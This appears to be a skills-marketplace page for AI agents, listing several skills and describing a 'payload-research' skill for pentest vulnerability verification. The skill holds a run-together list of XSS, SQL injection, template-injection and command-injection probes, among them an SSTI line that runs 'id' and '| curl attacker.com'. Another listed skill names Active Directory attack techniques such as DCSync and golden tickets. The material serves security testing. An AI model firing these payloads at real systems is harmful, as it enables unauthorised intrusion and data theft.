بنقرة واحدة
payload-research
Payload crafting and bypass research for vulnerability verification
التثبيت باستخدام Codex أو Claude انسخ هذا Prompt والصقه في Codex أو Claude أو مساعد آخر ليراجع صفحة Skill ويثبّتها لك.
القائمة
Payload crafting and bypass research for vulnerability verification
التثبيت باستخدام Codex أو Claude انسخ هذا Prompt والصقه في Codex أو Claude أو مساعد آخر ليراجع صفحة Skill ويثبّتها لك.
استنادا إلى تصنيف SOC المهني
This skill should be used when working with Bun runtime, bun:sqlite, Bun.serve, bun:test, or when "Bun", "bun:test", or Bun-specific patterns are mentioned.
pi-mono agent framework reference (github.com/badlogic/pi-mono). TRIGGER when: writing agent code using pi-ai/pi-agent-core/pi-coding-agent packages, defining tools with TypeBox schemas, implementing TUI or Web UI over an agent core, building extensions that hook into agent lifecycle, working with session/compaction/retry logic, implementing LLM provider abstractions, or any code that imports from @mariozechner/* packages.
UI/UX design intelligence. 50 styles, 21 palettes, 50 font pairings, 20 charts, 8 stacks (React, Next.js, Vue, Svelte, SwiftUI, React Native, Flutter, Tailwind). Actions: plan, build, create, design, implement, review, fix, improve, optimize, enhance, refactor, check UI/UX code. Projects: website, landing page, dashboard, admin panel, e-commerce, SaaS, portfolio, blog, mobile app, .html, .tsx, .vue, .svelte. Elements: button, modal, navbar, sidebar, card, table, form, chart. Styles: glassmorphism, claymorphism, minimalism, brutalism, neumorphism, bento grid, dark mode, responsive, skeuomorphism, flat design. Topics: color palette, accessibility, animation, layout, typography, font pairing, spacing, hover, shadow, gradient.
Active Directory 域渗透全链路指导技能。基于 GOAD (Game of Active Directory) 靶场实战经验, 涵盖从初始侦察、用户枚举、密码攻击、中继与投毒、ADCS证书攻击、MSSQL利用、提权、 横向移动、凭据提取、ACL滥用、委派攻击、域信任利用到域控拿下的完整渗透链。 当用户提到以下任何关键词时,务必触发此技能: AD渗透、域渗透、Active Directory、域控攻击、内网渗透、kerberoasting、AS-REP roasting、 NTLM relay、responder、bloodhound、certipy、ADCS、ESC1-ESC15、PetitPotam、 noPac、PrintNightmare、横向移动、pass the hash、golden ticket、silver ticket、 DCSync、secretsdump、mimikatz、委派攻击、delegation、ACL滥用、域信任、 forest trust、提权、SeImpersonate、KrbRelay、MSSQL提权、webshell、 凭据收集、密码喷洒、password spray、域枚举、SMB签名、coercer、 shadow credentials、certifried、RBCD、GPO abuse、LAPS、 即使用户没有明确说"域渗透",只要涉及Windows域环境的攻击场景都应使用此技能。
Browser automation CLI for AI agents. Use when the user needs to interact with websites, including navigating pages, filling forms, clicking buttons, taking screenshots, extracting data, testing web apps, or automating any browser task. Triggers include requests to "open a website", "fill out a form", "click a button", "take a screenshot", "scrape data from a page", "test this web app", "login to a site", "automate browser actions", or any task requiring programmatic web interaction.
Help with ffuf-based Web parameter fuzzing. Use this skill whenever the user wants to fuzz Web request paths, query parameters, headers, POST bodies, JSON fields, or raw HTTP requests with ffuf, or when they ask for an ffuf command, wordlist choice, false-positive filtering, matcher/filter tuning, or replaying hits into Burp/ZAP.
| name | payload-research |
| description | Payload crafting and bypass research for vulnerability verification |
| tags | ["pentest","payload","research"] |
Use this skill when you need to research, craft, or refine payloads for vulnerability verification.
<script>alert(1)</script><img onerror=alert(1) src=x><svg onload=alert(1)>{{constructor.constructor('alert(1)')()}}' OR '1'='1, 1; SELECT 1--' UNION SELECT null,null--'; WAITFOR DELAY '0:0:5'--{{7*7}}, ${7*7}, <%= 7*7 %>{{config.__class__.__init__.__globals__['os'].popen('id').read()}}; id, | id, `id`; sleep 5, | curl attacker.comsubmit_sub_agent_output exactly once.candidate_findings.status as candidate (no final vulnerability verdicts here).hypothesis_id is provided, all submitted hypotheses/findings must remain on that single hypothesis.goal_achieved=true, default action is stop and hand off to document/report unless deep-dive is explicitly requested.